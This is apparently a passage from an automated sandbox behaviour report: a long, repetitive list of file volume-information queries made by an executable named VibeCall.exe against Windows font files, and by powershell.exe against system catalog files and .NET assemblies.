Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
